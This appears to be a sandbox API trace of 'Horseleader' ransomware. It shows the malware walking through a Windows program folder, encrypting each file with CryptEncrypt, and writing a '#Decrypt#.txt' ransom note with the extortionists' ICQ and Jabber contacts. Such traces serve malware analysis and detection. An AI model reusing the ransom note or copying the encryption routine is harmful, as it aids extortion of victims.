hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5aaf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="bandwidth.png", cAlternateFileName="")) returned 1 [0251.779] lstrcmpiW (lpString1="bandwidth.png", lpString2="Windows") returned -1 [0251.779] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png") returned 76 [0251.779] StrStrIW (lpFirst="bandwidth.png", lpSrch=".horseleader") returned 0x0 [0251.779] lstrcmpW (lpString1="bandwidth.png", lpString2="#Decrypt#.txt") returned 1 [0251.779] lstrcmpW (lpString1="bandwidth.png", lpString2="_uninstalling_.png") returned 1 [0251.779] lstrlenW (lpString=".testttjffg") returned 11 [0251.779] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", lpSrch=".testttjffg") returned 0x0 [0251.779] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.779] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.784] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a25756, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a25756, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="blackbars80.png", cAlternateFileName="")) returned 1 [0251.784] lstrcmpiW (lpString1="blackbars80.png", lpString2="Windows") returned -1 [0251.784] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned 78 [0251.784] StrStrIW (lpFirst="blackbars80.png", lpSrch=".horseleader") returned 0x0 [0251.784] lstrcmpW (lpString1="blackbars80.png", lpString2="#Decrypt#.txt") returned 1 [0251.784] lstrcmpW (lpString1="blackbars80.png", lpString2="_uninstalling_.png") returned 1 [0251.784] lstrlenW (lpString=".testttjffg") returned 11 [0251.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", lpSrch=".testttjffg") returned 0x0 [0251.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.784] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ceb11, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x708ceb11, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.784] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.784] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png") returned 95 [0251.784] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.784] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.785] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.785] lstrlenW (lpString=".testttjffg") returned 11 [0251.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.785] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70810440, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70810440, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.785] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.785] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png") returned 101 [0251.785] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.785] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.785] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.785] lstrlenW (lpString=".testttjffg") returned 11 [0251.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.786] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7083659d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7083659d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.786] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.786] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png") returned 96 [0251.786] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.786] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.786] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.786] lstrlenW (lpString=".testttjffg") returned 11 [0251.786] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.786] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.786] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.786] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707c4186, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707c4186, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.786] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.786] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png") returned 102 [0251.786] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.787] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.787] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.787] lstrlenW (lpString=".testttjffg") returned 11 [0251.787] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.787] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.787] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.787] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png") returned 93 [0251.787] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.787] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.787] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.787] lstrlenW (lpString=".testttjffg") returned 11 [0251.787] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.788] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707ea2e3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707ea2e3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.788] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png") returned 99 [0251.788] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.788] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.788] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.788] lstrlenW (lpString=".testttjffg") returned 11 [0251.788] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.788] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.788] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.788] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70940f28, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70940f28, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84ca6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask.wmv", cAlternateFileName="")) returned 1 [0251.788] lstrcmpiW (lpString1="Panel_Mask.wmv", lpString2="Windows") returned -1 [0251.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv") returned 77 [0251.788] StrStrIW (lpFirst="Panel_Mask.wmv", lpSrch=".horseleader") returned 0x0 [0251.789] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.789] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.789] lstrlenW (lpString=".testttjffg") returned 11 [0251.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.789] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.789] lstrcmpiW (lpString1="Panel_Mask_PAL.wmv", lpString2="Windows") returned -1 [0251.789] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv") returned 81 [0251.789] StrStrIW (lpFirst="Panel_Mask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.789] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.789] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.789] lstrlenW (lpString=".testttjffg") returned 11 [0251.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.790] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 0 [0251.790] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\#Decrypt#.txt") returned 76 [0251.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.793] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.793] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.794] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsD